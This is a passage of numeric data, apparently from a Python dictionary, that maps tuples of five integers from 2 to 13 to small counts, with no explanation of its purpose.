(2, 5, 9, 13, 13): 10,
(2, 5, 10, 10, 10): 5,
(2, 5, 10, 10, 11): 10,
(2, 5, 10, 10, 12): 14,
(2, 5, 10, 10, 13): 7,
(2, 5, 10, 11, 11): 7,
(2, 5, 10, 11, 12): 17,
(2, 5, 10, 11, 13): 12,
(2, 5, 10, 12, 12): 9,
(2, 5, 10, 12, 13): 18,
(2, 5, 10, 13, 13): 6,
(2, 5, 11, 11, 11): 1,
(2, 5, 11, 11, 12): 7,
(2, 5, 11, 11, 13): 8,
(2, 5, 11, 12, 12): 7,
(2, 5, 11, 12, 13): 10,
(2, 5, 11, 13, 13): 9,
(2, 5, 12, 12, 12): 9,
(2, 5, 12, 12, 13): 5,
(2, 5, 12, 13, 13): 5,
(2, 5, 13, 13, 13): 4,
(2, 6, 6, 6, 6): 6,
(2, 6, 6, 6, 7): 7,
(2, 6, 6, 6, 8): 12,
(2, 6, 6, 6, 9): 12,
(2, 6, 6, 6, 10): 9,
(2, 6, 6, 6, 11): 8,
(2, 6, 6, 6, 12): 16,
(2, 6, 6, 6, 13): 7,
(2, 6, 6, 7, 7): 9,
(2, 6, 6, 7, 8): 14,
(2, 6, 6, 7, 9): 13,
(2, 6, 6, 7, 10): 10,
(2, 6, 6, 7, 11): 9,
(2, 6, 6, 7, 12): 13,
(2, 6, 6, 7, 13): 9,
(2, 6, 6, 8, 8): 6,
(2, 6, 6, 8, 9): 22,
(2, 6, 6, 8, 10): 18,
(2, 6, 6, 8, 11): 14,
(2, 6, 6, 8, 12): 28,
(2, 6, 6, 8, 13): 7,
(2, 6, 6, 9, 9): 11,
(2, 6, 6, 9, 10): 20,
(2, 6, 6, 9, 11): 17,
(2, 6, 6, 9, 12): 32,
(2, 6, 6, 9, 13): 11,
(2, 6, 6, 10, 10): 8,
(2, 6, 6, 10, 11): 7,
(2, 6, 6, 10, 12): 26,
(2, 6, 6, 10, 13): 9,
(2, 6, 6, 11, 11): 2,
(2, 6, 6, 11, 12): 13,
(2, 6, 6, 11, 13): 5,
(2, 6, 6, 12, 12): 23,
(2, 6, 6, 12, 13): 13,
(2, 6, 6, 13, 13): 6,
(2, 6, 7, 7, 7): 8,
(2, 6, 7, 7, 8): 16,
(2, 6, 7, 7, 9): 10,
(2, 6, 7, 7, 10): 12,
(2, 6, 7, 7, 11): 9,
(2, 6, 7, 7, 12): 11,
(2, 6, 7, 7, 13): 9,
(2, 6, 7, 8, 8): 17,
(2, 6, 7, 8, 9): 11,
(2, 6, 7, 8, 10): 21,
(2, 6, 7, 8, 11): 11,
(2, 6, 7, 8, 12): 20,
(2, 6, 7, 8, 13): 19,
(2, 6, 7, 9, 9): 19,
(2, 6, 7, 9, 10): 15,
(2, 6, 7, 9, 11): 13,
(2, 6, 7, 9, 12): 34,
(2, 6, 7, 9, 13): 12,
(2, 6, 7, 10, 10): 9,
(2, 6, 7, 10, 11): 13,
(2, 6, 7, 10, 12): 23,
(2, 6, 7, 10, 13): 18,
(2, 6, 7, 11, 11): 6,
(2, 6, 7, 11, 12): 13,
(2, 6, 7, 11, 13): 11,
(2, 6, 7, 12, 12): 20,
(2, 6, 7, 12, 13): 17,
(2, 6, 7, 13, 13): 6,
(2, 6, 8, 8, 8): 7,
(2, 6, 8, 8, 9): 15,
(2, 6, 8, 8, 10): 21,
(2, 6, 8, 8, 11): 14,
(2, 6, 8, 8, 12): 16,
(2, 6, 8, 8, 13): 9,
(2, 6, 8, 9, 9): 16,
(2, 6, 8, 9, 10): 23,
(2, 6, 8, 9, 11): 7,
(2, 6, 8, 9, 12): 41,
(2, 6, 8, 9, 13): 12,
(2, 6, 8, 10, 10): 12,
(2, 6, 8, 10, 11): 23,
(2, 6, 8, 10, 12): 31,
(2, 6, 8, 10, 13): 30,
(2, 6, 8, 11, 11): 10,
(2, 6, 8, 11, 12): 30,
(2, 6, 8, 11, 13): 10,
(2, 6, 8, 12, 12): 17,
(2, 6, 8, 12, 13): 19,
(2, 6, 8, 13, 13): 9,
(2, 6, 9, 9, 9): 7,
(2, 6, 9, 9, 10): 13,
(2, 6, 9, 9, 11): 9,
(2, 6, 9, 9, 12): 18,
(2, 6, 9, 9, 13): 12,
(2, 6, 9, 10, 10): 7,
(2, 6, 9, 10, 11): 14,
(2, 6, 9, 10, 12): 35,
(2, 6, 9, 10, 13): 6,
(2, 6, 9, 11, 11): 8,
(2, 6, 9, 11, 12): 20,
(2, 6, 9, 11, 13): 14,
(2, 6, 9, 12, 12): 19,
(2, 6, 9, 12, 13): 21,
(2, 6, 9, 13, 13): 6,
(2, 6, 10, 10, 10): 7,
(2, 6, 10, 10, 11): 9,
(2, 6, 10, 10, 12): 14,
(2, 6, 10, 10, 13): 9,
(2, 6, 10, 11, 11): 6,
(2, 6, 10, 11, 12): 17,
(2, 6, 10, 11, 13): 12,
(2, 6, 10, 12, 12): 20,
(2, 6, 10, 12, 13): 15,
(2, 6, 10, 13, 13): 7,
(2, 6, 11, 11, 11): 2,
(2, 6, 11, 11, 12): 8,
(2, 6, 11, 11, 13): 7,
(2, 6, 11, 12, 12): 14,
(2, 6, 11, 12, 13): 8,
(2, 6, 11, 13, 13): 7,
(2, 6, 12, 12, 12): 7,
(2, 6, 12, 12, 13): 14,
(2, 6, 12, 13, 13): 6,
(2, 6, 13, 13, 13): 2,
(2, 7, 7, 7, 7): 5,
(2, 7, 7, 7, 8): 5,
(2, 7, 7, 7, 9): 7,
(2, 7, 7, 7, 10): 9,
(2, 7, 7, 7, 11): 7,
(2, 7, 7, 7, 12): 4,
(2, 7, 7, 7, 13): 8,
(2, 7, 7, 8, 8): 5,
(2, 7, 7, 8, 9): 13,
(2, 7, 7, 8, 10): 9,
(2, 7, 7, 8, 11): 9,
(2, 7, 7, 8, 12): 12,
(2, 7, 7, 8, 13): 8,
(2, 7, 7, 9, 9): 2,
(2, 7, 7, 9, 10): 9,
(2, 7, 7, 9, 11): 10,
(2, 7, 7, 9, 12): 14,
(2, 7, 7, 9, 13): 11,
(2, 7, 7, 10, 10): 7,
(2, 7, 7, 10, 11): 8,
(2, 7, 7, 10, 12): 15,
(2, 7, 7, 10, 13): 5,
(2, 7, 7, 11, 11): 5,
(2, 7, 7, 11, 12): 11,
(2, 7, 7, 11, 13): 6,
(2, 7, 7, 12, 12): 5,
(2, 7, 7, 12, 13): 9,
(2, 7, 7, 13, 13): 8,
(2, 7, 8, 8, 8): 3,
(2, 7, 8, 8, 9): 4,
(2, 7, 8, 8, 10): 11,
(2, 7, 8, 8, 11): 6,
(2, 7, 8, 8, 12): 13,
(2, 7, 8, 8, 13): 8,
(2, 7, 8, 9, 9): 4,
(2, 7, 8, 9, 10): 15,
(2, 7, 8, 9, 11): 19,
(2, 7, 8, 9, 12): 8,
(2, 7, 8, 9, 13): 14,
(2, 7, 8, 10, 10): 13,
(2, 7, 8, 10, 11): 10,
(2, 7, 8, 10, 12): 20,
(2, 7, 8, 10, 13): 7,
(2, 7, 8, 11, 11): 8,
(2, 7, 8, 11, 12): 8,
(2, 7, 8, 11, 13): 13,
(2, 7, 8, 12, 12): 15,
(2, 7, 8, 12, 13): 10,
(2, 7, 8, 13, 13): 4,
(2, 7, 9, 9, 9): 2,
(2, 7, 9, 9, 10): 9,
(2, 7, 9, 9, 11): 5,
(2, 7, 9, 9, 12): 12,
(2, 7, 9, 9, 13): 5,
(2, 7, 9, 10, 10): 11,
(2, 7, 9, 10, 11): 10,
(2, 7, 9, 10, 12): 10,
(2, 7, 9, 10, 13): 16,
(2, 7, 9, 11, 11): 7,
(2, 7, 9, 11, 12): 17,
(2, 7, 9, 11, 13): 11,
(2, 7, 9, 12, 12): 13,
(2, 7, 9, 12, 13): 14,
(2, 7, 9, 13, 13): 4,
(2, 7, 10, 10, 10): 2,
(2, 7, 10, 10, 11): 6,
(2, 7, 10, 10, 12): 9,
(2, 7, 10, 10, 13): 8,
(2, 7, 10, 11, 11): 7,
(2, 7, 10, 11, 12): 15,
(2, 7, 10, 11, 13): 12,
(2, 7, 10, 12, 12): 11,
(2, 7, 10, 12, 13): 10,
(2, 7, 10, 13, 13): 8,
(2, 7, 11, 11, 11): 3,
(2, 7, 11, 11, 12): 6,
(2, 7, 11, 11, 13): 4,
(2, 7, 11, 12, 12): 5,
(2, 7, 11, 12, 13): 8,
(2, 7, 11, 13, 13): 5,
(2, 7, 12, 12, 12): 2,
(2, 7, 12, 12, 13): 9,
(2, 7, 12, 13, 13): 5,
(2, 7, 13, 13, 13): 2,
(2, 8, 8, 8, 8): 1,
(2, 8, 8, 8, 9): 3,
(2, 8, 8, 8, 10): 3,
(2, 8, 8, 8, 11): 3,
(2, 8, 8, 8, 12): 5,
(2, 8, 8, 8, 13): 3,
(2, 8, 8, 9, 9): 2,
(2, 8, 8, 9, 10): 5,
(2, 8, 8, 9, 11): 7,
(2, 8, 8, 9, 12): 12,
(2, 8, 8, 9, 13): 3,
(2, 8, 8, 10, 10): 11,
(2, 8, 8, 10, 11): 9,
(2, 8, 8, 10, 12): 10,
(2, 8, 8, 10, 13): 6,
(2, 8, 8, 11, 11): 4,
(2, 8, 8, 11, 12): 10,
(2, 8, 8, 11, 13): 3,
(2, 8, 8, 12, 12): 7,
(2, 8, 8, 12, 13): 13,
(2, 8, 8, 13, 13): 3,
(2, 8, 9, 9, 10): 2,
(2, 8, 9, 9, 11): 6,
(2, 8, 9, 9, 12): 11,
(2, 8, 9, 9, 13): 5,
(2, 8, 9, 10, 10): 6,
(2, 8, 9, 10, 11): 14,
(2, 8, 9, 10, 12): 18,
(2, 8, 9, 10, 13): 11,
(2, 8, 9, 11, 11): 4,
(2, 8, 9, 11, 12): 9,
(2, 8, 9, 11, 13): 14,
(2, 8, 9, 12, 12): 14,
(2, 8, 9, 12, 13): 5,
(2, 8, 9, 13, 13): 6,
(2, 8, 10, 10, 10): 4,
(2, 8, 10, 10, 11): 4,
(2, 8, 10, 10, 12): 16,
(2, 8, 10, 10, 13): 9,
(2, 8, 10, 11, 11): 5,
(2, 8, 10, 11, 12): 19,
(2, 8, 10, 11, 13): 9,
(2, 8, 10, 12, 12): 6,
(2, 8, 10, 12, 13): 15,
(2, 8, 10, 13, 13): 4,
(2, 8, 11, 11, 11): 1,
(2, 8, 11, 11, 12): 7,
(2, 8, 11, 11, 13): 8,
(2, 8, 11, 12, 12): 9,
(2, 8, 11, 12, 13): 9,
(2, 8, 11, 13, 13): 3,
(2, 8, 12, 12, 12): 8,
(2, 8, 12, 12, 13): 7,
(2, 8, 12, 13, 13): 7,
(2, 8, 13, 13, 13): 3,
(2, 9, 9, 9, 11): 2,
(2, 9, 9, 9, 12): 7,
(2, 9, 9, 9, 13): 2,
(2, 9, 9, 10, 10): 1,
(2, 9, 9, 10, 11): 4,
(2, 9, 9, 10, 12): 12,
(2, 9, 9, 10, 13): 5,
(2, 9, 9, 11, 11): 4,
(2, 9, 9, 11, 12): 6,
(2, 9, 9, 11, 13): 3,
(2, 9, 9, 12, 12): 7,
(2, 9, 9, 12, 13): 7,
(2, 9, 9, 13, 13): 2,
(2, 9, 10, 10, 10): 1,
(2, 9, 10, 10, 11): 7,
(2, 9, 10, 10, 12): 5,
(2, 9, 10, 10, 13): 9,
(2, 9, 10, 11, 11): 4,
(2, 9, 10, 11, 12): 9,
(2, 9, 10, 11, 13): 9,
(2, 9, 10, 12, 12): 9,
(2, 9, 10, 12, 13): 10,
(2, 9, 10, 13, 13): 4,
(2, 9, 11, 11, 11): 4,
(2, 9, 11, 11, 12): 7,
(2, 9, 11, 11, 13): 7,
(2, 9, 11, 12, 12): 9,
(2, 9, 11, 12, 13): 12,
(2, 9, 11, 13, 13): 5,
(2, 9, 12, 12, 12): 7,
(2, 9, 12, 12, 13): 10,
(2, 9, 12, 13, 13): 4,
(2, 9, 13, 13, 13): 1,
(2, 10, 10, 10, 10): 2,
(2, 10, 10, 10, 11): 1,
(2, 10, 10, 10, 12): 4,
(2, 10, 10, 10, 13): 2,
(2, 10, 10, 11, 11): 5,
(2, 10, 10, 11, 12): 4,
(2, 10, 10, 11, 13): 6,
(2, 10, 10, 12, 12): 4,
(2, 10, 10, 12, 13): 9,
(2, 10, 10, 13, 13): 3,
(2, 10, 11, 11, 11): 1,
(2, 10, 11, 11, 12): 7,
(2, 10, 11, 11, 13): 5,
(2, 10, 11, 12, 12): 7,
(2, 10, 11, 12, 13): 7,
(2, 10, 11, 13, 13): 7,
(2, 10, 12, 12, 12): 3,
(2, 10, 12, 12, 13): 8,
(2, 10, 12, 13, 13): 6,
(2, 10, 13, 13, 13): 1,
(2, 11, 11, 11, 11): 2,
(2, 11, 11, 11, 12): 1,
(2, 11, 11, 11, 13): 3,
(2, 11, 11, 12, 12): 1,
(2, 11, 11, 12, 13): 7,
(2, 11, 11, 13, 13): 1,
(2, 11, 12, 12, 12): 1,
(2, 11, 12, 12, 13): 2,
(2, 11, 12, 13, 13): 2,
(2, 12, 12, 12, 12): 1,
(3, 3, 3, 3, 4): 5,
(3, 3, 3, 3, 5): 4,
(3, 3, 3, 3, 6): 6,
(3, 3, 3, 3, 7): 3,
(3, 3, 3, 3, 8): 4,
(3, 3, 3, 3, 9): 2,
(3, 3, 3, 3, 10): 2,
(3, 3, 3, 3, 11): 2,
(3, 3, 3, 3, 12): 6,
(3, 3, 3, 3, 13): 4,
(3, 3, 3, 4, 4): 3,
(3, 3, 3, 4, 5): 8,
(3, 3, 3, 4, 6): 11,
(3, 3, 3, 4, 7): 9,
(3, 3, 3, 4, 8): 5,
(3, 3, 3, 4, 9): 14,
(3, 3, 3, 4, 10): 5,
(3, 3, 3, 4, 11): 8,
(3, 3, 3, 4, 12): 9,
(3, 3, 3, 4, 13): 3,
(3, 3, 3, 5, 5): 3,
(3, 3, 3, 5, 6): 16,
(3, 3, 3, 5, 7): 4,
(3, 3, 3, 5, 8): 7,
(3, 3, 3, 5, 9): 9,
(3, 3, 3, 5, 10): 9,
(3, 3, 3, 5, 11): 2,
(3, 3, 3, 5, 12): 8,
(3, 3, 3, 5, 13): 2,
(3, 3, 3, 6, 6): 7,
(3, 3, 3, 6, 7): 10,
(3, 3, 3, 6, 8): 7,
(3, 3, 3, 6, 9): 17,
(3, 3, 3, 6, 10): 11,
(3, 3, 3, 6, 11): 12,
(3, 3, 3, 6, 12): 11,
(3, 3, 3, 6, 13): 9,
(3, 3, 3, 7, 7): 4,
(3, 3, 3, 7, 8): 7,
(3, 3, 3, 7, 9): 7,
(3, 3, 3, 7, 10): 5,
(3, 3, 3, 7, 11): 3,
(3, 3, 3, 7, 12): 12,
(3, 3, 3, 7, 13): 1,
(3, 3, 3, 8, 8): 2,
(3, 3, 3, 8, 9): 9,
(3, 3, 3, 8, 10): 3,
(3, 3, 3, 8, 11): 4,
(3, 3, 3, 8, 12): 6,
(3, 3, 3, 8, 13): 7,
(3, 3, 3, 9, 9): 4,
(3, 3, 3, 9, 10): 7,
(3, 3, 3, 9, 11): 7,
(3, 3, 3, 9, 12): 14,
(3, 3, 3, 9, 13): 11,
(3, 3, 3, 10, 10): 1,
(3, 3, 3, 10, 11): 6,
(3, 3, 3, 10, 12): 5,
(3, 3, 3, 10, 13): 7,
(3, 3, 3, 11, 11): 1,
(3, 3, 3, 11, 12): 7,
(3, 3, 3, 11, 13): 1,
(3, 3, 3, 12, 12): 8,
(3, 3, 3, 12, 13): 6,
(3, 3, 4, 4, 5): 6,
(3, 3, 4, 4, 6): 17,
(3, 3, 4, 4, 7): 6,
(3, 3, 4, 4, 8): 7,
(3, 3, 4, 4, 9): 7,
(3, 3, 4, 4, 10): 10,
(3, 3, 4, 4, 11): 3,
(3, 3, 4, 4, 12): 6,
(3, 3, 4, 4, 13): 4,
(3, 3, 4, 5, 5): 5,
(3, 3, 4, 5, 6): 12,
(3, 3, 4, 5, 7): 16,
(3, 3, 4, 5, 8): 13,
(3, 3, 4, 5, 9): 19,
(3, 3, 4, 5, 10): 10,
(3, 3, 4, 5, 11): 9,
(3, 3, 4, 5, 12): 19,
(3, 3, 4, 5, 13): 11,
(3, 3, 4, 6, 6): 13,
(3, 3, 4, 6, 7): 14,
(3, 3, 4, 6, 8): 24,
(3, 3, 4, 6, 9): 25,
(3, 3, 4, 6, 10): 20,
(3, 3, 4, 6, 11): 12,
(3, 3, 4, 6, 12): 32,
(3, 3, 4, 6, 13): 11,
(3, 3, 4, 7, 7): 8,
(3, 3, 4, 7, 8): 8,
(3, 3, 4, 7, 9): 20,
(3, 3, 4, 7, 10): 17,
(3, 3, 4, 7, 11): 15,
(3, 3, 4, 7, 12): 11,
(3, 3, 4, 7, 13): 8,
(3, 3, 4, 8, 8): 2,
(3, 3, 4, 8, 9): 12,
(3, 3, 4, 8, 10): 15,
(3, 3, 4, 8, 11): 10,
(3, 3, 4, 8, 12): 10,
(3, 3, 4, 8, 13): 8,
(3, 3, 4, 9, 9): 15,
(3, 3, 4, 9, 10): 12,
(3, 3, 4, 9, 11): 15,
(3, 3, 4, 9, 12): 16,
(3, 3, 4, 9, 13): 11,
(3, 3, 4, 10, 10): 3,
(3, 3, 4, 10, 11): 9,
(3, 3, 4, 10, 12): 27,
(3, 3, 4, 10, 13): 12,
(3, 3, 4, 11, 11): 4,
(3, 3, 4, 11, 12): 12,
(3, 3, 4, 11, 13): 10,
(3, 3, 4, 12, 12): 7,
(3, 3, 4, 12, 13): 6,
(3, 3, 4, 13, 13): 7,
(3, 3, 5, 5, 5): 3,
(3, 3, 5, 5, 6): 9,
(3, 3, 5, 5, 7): 6,
(3, 3, 5, 5, 8): 8,
(3, 3, 5, 5, 9): 3,
(3, 3, 5, 5, 10): 3,
(3, 3, 5, 5, 11): 5,
(3, 3, 5, 5, 12): 13,
(3, 3, 5, 5, 13): 6,
(3, 3, 5, 6, 6): 16,
(3, 3, 5, 6, 7): 25,
(3, 3, 5, 6, 8): 13,
(3, 3, 5, 6, 9): 31,
(3, 3, 5, 6, 10): 15,
(3, 3, 5, 6, 11): 16,
(3, 3, 5, 6, 12): 20,
(3, 3, 5, 6, 13): 15,
(3, 3, 5, 7, 7): 7,
(3, 3, 5, 7, 8): 10,
(3, 3, 5, 7, 9): 11,
(3, 3, 5, 7, 10): 14,
(3, 3, 5, 7, 11): 10,
(3, 3, 5, 7, 12): 18,
(3, 3, 5, 7, 13): 10,
(3, 3, 5, 8, 8): 5,
(3, 3, 5, 8, 9): 14,
(3, 3, 5, 8, 10): 17,
(3, 3, 5, 8, 11): 15,
(3, 3, 5, 8, 12): 8,
(3, 3, 5, 8, 13): 5,
(3, 3, 5, 9, 9): 17,
(3, 3, 5, 9, 10): 22,
(3, 3, 5, 9, 11): 4,
(3, 3, 5, 9, 12): 24,
(3, 3, 5, 9, 13): 5,
(3, 3, 5, 10, 10): 5,
(3, 3, 5, 10, 11): 3,
(3, 3, 5, 10, 12): 15,
(3, 3, 5, 10, 13): 14,
(3, 3, 5, 11, 11): 5,
(3, 3, 5, 11, 12): 14,
(3, 3, 5, 11, 13): 10,
(3, 3, 5, 12, 12): 11,
(3, 3, 5, 12, 13): 12,
(3, 3, 5, 13, 13): 2,
(3, 3, 6, 6, 6): 8,
(3, 3, 6, 6, 7): 11,
(3, 3, 6, 6, 8): 13,
(3, 3, 6, 6, 9): 16,
(3, 3, 6, 6, 10): 10,
(3, 3, 6, 6, 11): 7,
(3, 3, 6, 6, 12): 25,
(3, 3, 6, 6, 13): 8,
(3, 3, 6, 7, 7): 17,
(3, 3, 6, 7, 8): 14,
(3, 3, 6, 7, 9): 23,
(3, 3, 6, 7, 10): 11,
(3, 3, 6, 7, 11): 14,
(3, 3, 6, 7, 12): 17,
(3, 3, 6, 7, 13): 14,
(3, 3, 6, 8, 8): 14,
(3, 3, 6, 8, 9): 23,
(3, 3, 6, 8, 10): 16,
(3, 3, 6, 8, 11): 3,
(3, 3, 6, 8, 12): 28,
(3, 3, 6, 8, 13): 5,
(3, 3, 6, 9, 9): 12,
(3, 3, 6, 9, 10): 22,
(3, 3, 6, 9, 11): 24,
(3, 3, 6, 9, 12): 35,
(3, 3, 6, 9, 13): 26,
(3, 3, 6, 10, 10): 5,
(3, 3, 6, 10, 11): 5,
(3, 3, 6, 10, 12): 21,
(3, 3, 6, 10, 13): 2,
(3, 3, 6, 11, 11): 5,
(3, 3, 6, 11, 12): 18,
(3, 3, 6, 11, 13): 8,
(3, 3, 6, 12, 12): 19,
(3, 3, 6, 12, 13): 17,
(3, 3, 6, 13, 13): 5,
(3, 3, 7, 7, 7): 3,
(3, 3, 7, 7, 8): 10,
(3, 3, 7, 7, 9): 10,
(3, 3, 7, 7, 10): 4,
(3, 3, 7, 7, 11): 5,
(3, 3, 7, 7, 12): 15,
(3, 3, 7, 7, 13): 5,
(3, 3, 7, 8, 8): 5,
(3, 3, 7, 8, 9): 16,
(3, 3, 7, 8, 10): 9,
(3, 3, 7, 8, 11): 4,
(3, 3, 7, 8, 12): 10,
(3, 3, 7, 8, 13): 14,
(3, 3, 7, 9, 9): 9,
(3, 3, 7, 9, 10): 12,
(3, 3, 7, 9, 11): 8,
(3, 3, 7, 9, 12): 21,
(3, 3, 7, 9, 13): 4,
(3, 3, 7, 10, 10): 9,
(3, 3, 7, 10, 11): 12,
(3, 3, 7, 10, 12): 11,
(3, 3, 7, 10, 13): 5,
(3, 3, 7, 11, 11): 5,
(3, 3, 7, 11, 12): 16,
(3, 3, 7, 11, 13): 5,
(3, 3, 7, 12, 12): 9,
(3, 3, 7, 12, 13): 14,
(3, 3, 7, 13, 13): 8,
(3, 3, 8, 8, 8): 1,
(3, 3, 8, 8, 9): 2,
(3, 3, 8, 8, 10): 6,
(3, 3, 8, 8, 11): 2,
(3, 3, 8, 8, 12): 3,
(3, 3, 8, 8, 13): 5,
(3, 3, 8, 9, 9): 10,
(3, 3, 8, 9, 10): 9,
(3, 3, 8, 9, 11): 11,
(3, 3, 8, 9, 12): 14,
(3, 3, 8, 9, 13): 6,
(3, 3, 8, 10, 10): 5,
(3, 3, 8, 10, 11): 12,
(3, 3, 8, 10, 12): 16,
(3, 3, 8, 10, 13): 5,
(3, 3, 8, 11, 11): 5,
(3, 3, 8, 11, 12): 8,
(3, 3, 8, 11, 13): 6,
(3, 3, 8, 12, 12): 4,
(3, 3, 8, 12, 13): 10,
(3, 3, 8, 13, 13): 2,
(3, 3, 9, 9, 9): 3,
(3, 3, 9, 9, 10): 12,
(3, 3, 9, 9, 11): 8,
(3, 3, 9, 9, 12): 16,
(3, 3, 9, 9, 13): 8,
(3, 3, 9, 10, 10): 3,
(3, 3, 9, 10, 11): 11,
(3, 3, 9, 10, 12): 16,
(3, 3, 9, 10, 13): 8,
(3, 3, 9, 11, 11): 1,
(3, 3, 9, 11, 12): 13,
(3, 3, 9, 11, 13): 6,
(3, 3, 9, 12, 12): 15,
(3, 3, 9, 12, 13): 12,
(3, 3, 9, 13, 13): 3,
(3, 3, 10, 10, 10): 1,
(3, 3, 10, 10, 11): 2,
(3, 3, 10, 10, 12): 6,
(3, 3, 10, 10, 13): 7,
(3, 3, 10, 11, 11): 3,
(3, 3, 10, 11, 12): 7,
(3, 3, 10, 11, 13): 5,
(3, 3, 10, 12, 12): 8,
(3, 3, 10, 12, 13): 11,
(3, 3, 10, 13, 13): 6,
(3, 3, 11, 11, 11): 2,
(3, 3, 11, 11, 12): 5,
(3, 3, 11, 11, 13): 3,
(3, 3, 11, 12, 12): 3,
(3, 3, 11, 12, 13): 7,
(3, 3, 11, 13, 13): 2,
(3, 3, 12, 12, 12): 3,
(3, 3, 12, 12, 13): 2,
(3, 3, 12, 13, 13): 6,
(3, 3, 13, 13, 13): 1,
(3, 4, 4, 4, 5): 1,
(3, 4, 4, 4, 6): 6,
(3, 4, 4, 4, 7): 4,
(3, 4, 4, 4, 8): 4,
(3, 4, 4, 4, 9): 3,
(3, 4, 4, 4, 10): 9,
(3, 4, 4, 4, 11): 3,
(3, 4, 4, 4, 12): 2,
(3, 4, 4, 4, 13): 4,
(3, 4, 4, 5, 5): 4,
(3, 4, 4, 5, 6): 19,
(3, 4, 4, 5, 7): 10,
(3, 4, 4, 5, 8): 7,
(3, 4, 4, 5, 9): 8,
(3, 4, 4, 5, 10): 22,
(3, 4, 4, 5, 11): 15,
(3, 4, 4, 5, 12): 6,
(3, 4, 4, 5, 13): 9,
(3, 4, 4, 6, 6): 12,
(3, 4, 4, 6, 7): 16,
(3, 4, 4, 6, 8): 13,
(3, 4, 4, 6, 9): 27,
(3, 4, 4, 6, 10): 17,
(3, 4, 4, 6, 11): 16,
(3, 4, 4, 6, 12): 28,
(3, 4, 4, 6, 13): 11,
(3, 4, 4, 7, 7): 6,
(3, 4, 4, 7, 8): 12,
(3, 4, 4, 7, 9): 10,
(3, 4, 4, 7, 10): 16,
(3, 4, 4, 7, 11): 12,
(3, 4, 4, 7, 12): 9,
(3, 4, 4, 7, 13): 8,
(3, 4, 4, 8, 8): 6,
(3, 4, 4, 8, 9): 10,
(3, 4, 4, 8, 10): 14,
(3, 4, 4, 8, 11): 6,
(3, 4, 4, 8, 12): 9,
(3, 4, 4, 8, 13): 8,
(3, 4, 4, 9, 9): 5,
(3, 4, 4, 9, 10): 14,
(3, 4, 4, 9, 11): 6,
(3, 4, 4, 9, 12): 11,
(3, 4, 4, 9, 13): 8,
(3, 4, 4, 10, 10): 7,
(3, 4, 4, 10, 11): 14,
(3, 4, 4, 10, 12): 17,
(3, 4, 4, 10, 13): 6,
(3, 4, 4, 11, 11): 6,
(3, 4, 4, 11, 12): 8,
(3, 4, 4, 11, 13): 10,
(3, 4, 4, 12, 12): 4,
(3, 4, 4, 12, 13): 7,
(3, 4, 4, 13, 13): 6,
(3, 4, 5, 5, 5): 6,
(3, 4, 5, 5, 6): 17,
(3, 4, 5, 5, 7): 12,
(3, 4, 5, 5, 8): 10,
(3, 4, 5, 5, 9): 12,
(3, 4, 5, 5, 10): 12,
(3, 4, 5, 5, 11): 10,
(3, 4, 5, 5, 12): 9,
(3, 4, 5, 5, 13): 11,
(3, 4, 5, 6, 6): 23,
(3, 4, 5, 6, 7): 21,
(3, 4, 5, 6, 8): 23,
(3, 4, 5, 6, 9): 22,
(3, 4, 5, 6, 10): 25,
(3, 4, 5, 6, 11): 26,
(3, 4, 5, 6, 12): 37,
(3, 4, 5, 6, 13): 21,
(3, 4, 5, 7, 7): 17,
(3, 4, 5, 7, 8): 21,
(3, 4, 5, 7, 9): 19,
(3, 4, 5, 7, 10): 20,
(3, 4, 5, 7, 11): 18,
(3, 4, 5, 7, 12): 30,
(3, 4, 5, 7, 13): 12,
(3, 4, 5, 8, 8): 5,
(3, 4, 5, 8, 9): 17,
(3, 4, 5, 8, 10): 29,
(3, 4, 5, 8, 11): 20,
(3, 4, 5, 8, 12): 12,
(3, 4, 5, 8, 13): 20,
(3, 4, 5, 9, 9): 14,
(3, 4, 5, 9, 10): 22,
(3, 4, 5, 9, 11): 16,
(3, 4, 5, 9, 12): 20,
(3, 4, 5, 9, 13): 19,
(3, 4, 5, 10, 10): 7,
(3, 4, 5, 10, 11): 19,
(3, 4, 5, 10, 12): 19,
(3, 4, 5, 10, 13): 16,
(3, 4, 5, 11, 11): 9,
(3, 4, 5, 11, 12): 14,
(3, 4, 5, 11, 13): 11,
(3, 4, 5, 12, 12): 15,
(3, 4, 5, 12, 13): 19,
(3, 4, 5, 13, 13): 3,
(3, 4, 6, 6, 6): 16,
(3, 4, 6, 6, 7): 22,
(3, 4, 6, 6, 8): 26,
(3, 4, 6, 6, 9): 29,
(3, 4, 6, 6, 10): 18,
(3, 4, 6, 6, 11): 16,
(3, 4, 6, 6, 12): 26,
(3, 4, 6, 6, 13): 17,
(3, 4, 6, 7, 7): 17,
(3, 4, 6, 7, 8): 33,
(3, 4, 6, 7, 9): 30,
(3, 4, 6, 7, 10): 15,
(3, 4, 6, 7, 11): 19,
(3, 4, 6, 7, 12): 36,
(3, 4, 6, 7, 13): 25,
(3, 4, 6, 8, 8): 20,
(3, 4, 6, 8, 9): 33,
(3, 4, 6, 8, 10): 23,
(3, 4, 6, 8, 11): 20,
(3, 4, 6, 8, 12): 61,
(3, 4, 6, 8, 13): 27,
(3, 4, 6, 9, 9): 19,
(3, 4, 6, 9, 10): 30,
(3, 4, 6, 9, 11): 21,
(3, 4, 6, 9, 12): 50,
(3, 4, 6, 9, 13): 15,
(3, 4, 6, 10, 10): 16,
(3, 4, 6, 10, 11): 17,
(3, 4, 6, 10, 12): 26,
(3, 4, 6, 10, 13): 10,
(3, 4, 6, 11, 11): 6,
(3, 4, 6, 11, 12): 25,
(3, 4, 6, 11, 13): 15,
(3, 4, 6, 12, 12): 31,
(3, 4, 6, 12, 13): 30,
(3, 4, 6, 13, 13): 7,
(3, 4, 7, 7, 7): 10,
(3, 4, 7, 7, 8): 12,
(3, 4, 7, 7, 9): 12,
(3, 4, 7, 7, 10): 13,
(3, 4, 7, 7, 11): 11,
(3, 4, 7, 7, 12): 12,
(3, 4, 7, 7, 13): 12,
(3, 4, 7, 8, 8): 8,
(3, 4, 7, 8, 9): 19,
(3, 4, 7, 8, 10): 26,
(3, 4, 7, 8, 11): 20,
(3, 4, 7, 8, 12): 11,
(3, 4, 7, 8, 13): 14,
(3, 4, 7, 9, 9): 14,
(3, 4, 7, 9, 10): 20,
(3, 4, 7, 9, 11): 19,
(3, 4, 7, 9, 12): 21,
(3, 4, 7, 9, 13): 18,
(3, 4, 7, 10, 10): 7,
(3, 4, 7, 10, 11): 17,
(3, 4, 7, 10, 12): 29,
(3, 4, 7, 10, 13): 13,
(3, 4, 7, 11, 11): 8,
(3, 4, 7, 11, 12): 15,
(3, 4, 7, 11, 13): 11,
(3, 4, 7, 12, 12): 8,
(3, 4, 7, 12, 13): 13,
(3, 4, 7, 13, 13): 7,
